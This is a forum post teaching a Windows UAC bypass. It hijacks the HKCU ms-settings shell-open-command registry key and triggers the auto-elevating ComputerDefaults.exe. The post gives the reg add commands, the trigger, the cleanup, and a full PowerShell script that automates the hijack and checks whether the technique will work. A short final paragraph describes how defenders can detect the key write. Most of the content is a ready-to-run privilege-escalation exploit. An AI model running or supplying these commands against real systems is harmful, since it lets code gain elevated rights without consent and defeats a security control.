11-07-25, 01:03 AM
There are some legitimate Windows binaries you can take advantage of. I'm going to talk about ComputerDefaults.exe, one of the living-off-the-land binaries (LOLBins); it lets users choose which programs are used by default. It is marked auto-elevate, so when an administrator runs it Windows starts it at high integrity without a UAC prompt, and it then opens the ms-settings: protocol handler. That handler is resolved through the current user's registry first, so two values under HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command (the default value and DelegateExecute) decide what actually gets executed. Because HKCU is writable by the user, hijacking them lets your command or script run with elevated privileges and bypass the UAC prompt. Note the precondition: the current user must already be a member of the local Administrators group (running with the filtered, medium-integrity token) and UAC must be at its default level ("notify me only when apps try to make changes"); it does nothing for a standard user, and with UAC set to "Always notify" auto-elevation is disabled and you still get a prompt. So let's start:
First we need to add the ms-settings\Shell\open\command registry key and set its default value to the script or command to run. In this example we will run cmd.exe, so type this command in cmd:
reg add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f
Then create an empty string value there named "DelegateExecute" (it must exist, but its content is irrelevant) by typing:
reg add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /v "DelegateExecute" /d "" /t REG_SZ /f
That's it, now all you have to do is run computerdefaults.exe. A new cmd.exe window should appear; you can confirm it is elevated with whoami /groups, which shows "Mandatory Label\High Mandatory Level" instead of Medium.
To clean the registry afterwards type (the ms-settings key does not exist under HKCU on a clean system, so deleting the whole key restores the original state):
reg delete HKEY_CURRENT_USER\Software\Classes\ms-settings /f
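The whole procedure as one script, added here as an example (this is not code from the original post). It performs the same three steps with PowerShell's registry provider instead of reg.exe, but first checks the preconditions the technique depends on: that the session is not already elevated, that the user is a member of local Administrators (read via whoami, because the filtered token reports that group as deny-only and .NET hides it), and that the UAC consent level is not "Always notify". The $Payload parameter and the 3-second wait are my assumptions, not something the post specifies.

```powershell
# Added example: ms-settings handler hijack via ComputerDefaults.exe, with checks and cleanup.
# Assumes a non-elevated PowerShell session of a local Administrators member on a
# default-UAC Windows 10/11 box. $Payload is a hypothetical parameter; cmd.exe matches the post.
param(
    [string]$Payload = "C:\Windows\System32\cmd.exe"
)

$hijackRoot = "HKCU:\Software\Classes\ms-settings"
$commandKey = "$hijackRoot\Shell\open\command"

function Test-IsElevated {
    # True when the current token already carries the Administrators group as enabled.
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($id)
    return $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Test-IsAdminMember {
    # whoami lists the group even when it is "used for deny only" in the filtered token.
    $groups = whoami /groups /fo csv | ConvertFrom-Csv
    return ($groups.SID -contains "S-1-5-32-544")
}

function Get-UacConsentLevel {
    # ConsentPromptBehaviorAdmin: 5 = default (no prompt for auto-elevate binaries),
    # 2 = "Always notify" (auto-elevation disabled), 0 = never prompt.
    $policy = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
    return (Get-ItemProperty -Path $policy -Name ConsentPromptBehaviorAdmin).ConsentPromptBehaviorAdmin
}

if (Test-IsElevated) {
    Write-Host "Already running elevated; there is nothing to bypass."
    return
}
if (-not (Test-IsAdminMember)) {
    Write-Host "Current user is not in local Administrators; ComputerDefaults.exe cannot auto-elevate for this account."
    return
}
if ((Get-UacConsentLevel) -eq 2) {
    Write-Host "UAC is set to Always notify; auto-elevation is disabled and a prompt will appear."
    return
}

# Stage the hijacked handler: default value = command to run, DelegateExecute = empty string.
New-Item -Path $commandKey -Force | Out-Null
Set-ItemProperty -Path $commandKey -Name "(default)" -Value $Payload
New-ItemProperty -Path $commandKey -Name "DelegateExecute" -Value "" -PropertyType String -Force | Out-Null

# Trigger the auto-elevating binary; it resolves ms-settings: through HKCU and runs $Payload.
Start-Process -FilePath "$env:SystemRoot\System32\ComputerDefaults.exe"
Start-Sleep -Seconds 3   # assumed: give the handler time to spawn the payload before cleanup

# Remove the whole HKCU ms-settings key; it is absent on a clean system, so this restores the original state.
Remove-Item -Path $hijackRoot -Recurse -Force -ErrorAction SilentlyContinue
Write-Host "Done. Verify elevation in the new window with: whoami /groups"
```

From the defensive side, the same key path is the thing to watch: any creation of HKCU\Software\Classes\ms-settings\Shell\open\command, or a DelegateExecute value under it, by a process that is not Explorer is a strong signal, and the cleanup step means the key may only exist for a few seconds, so rely on registry-write telemetry rather than periodic scans.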